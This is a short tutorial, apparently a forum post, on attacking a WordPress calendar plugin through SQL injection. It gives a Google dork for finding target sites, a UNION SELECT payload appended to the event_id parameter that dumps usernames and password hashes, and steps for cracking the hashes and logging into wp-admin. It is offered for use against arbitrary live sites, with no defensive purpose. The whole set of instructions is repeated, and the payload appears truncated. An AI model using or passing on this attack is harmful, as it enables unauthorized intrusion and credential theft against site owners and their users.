WP Calender is vulnerable to sql injection in wordpress. So Follow my instruction.
1. Go to www.google.com
2. Dork:"powered by WordPress" inurl:"/?event_id="
Search it google and select anyone in a new tab which you comfortable.
3. Now after 'id=' use the code which is given below.
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
4. You get the username and password. Password are in hash form. Decrypt the Hash.
5. You can login in www.site.com/wp-admin
I hope you enjoy the tutorial. :-)
1. Go to www.google.com
2. Dork:"powered by WordPress" inurl:"/?event_id="
Search it google and select anyone in a new tab which you comfortable.
3. Now after 'id=' use the code which is given below.
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
4. You get the username and password. Password are in hash form. Decrypt the Hash.
5. You can login in www.site.com/wp-admin
I hope you enjoy the tutorial. :-)
